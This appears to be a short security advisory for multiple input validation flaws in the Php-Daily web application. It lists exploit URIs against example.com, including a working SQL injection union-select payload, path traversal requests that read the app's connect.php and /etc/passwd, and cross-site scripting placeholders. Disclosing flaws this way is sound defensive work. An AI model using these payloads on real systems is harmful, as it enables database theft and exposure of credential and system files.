|
Php-Daily Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user into visiting a malicious URI. The following exploit URIs are available: SQL injection: http://www.example.com/add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8# http://www.example.com/delete.php?prev=accueil&mode=postit&id=[SQL-INJ] http://www.example.com/prest_detail.php?prev=[SQL-INJ] http://www.example.com/mod_prest_date.php?prev=list&id=[SQL-INJ] File include: http://www.example.com/download_file.php?fichier=../include/connect.php http://www.example.com/download_file.php?fichier=../../../../../../etc/passwd Cross-site scripting: http://www.example.com/add_prest_date.php?date=[XSS] |
|
|
Privacy Statement |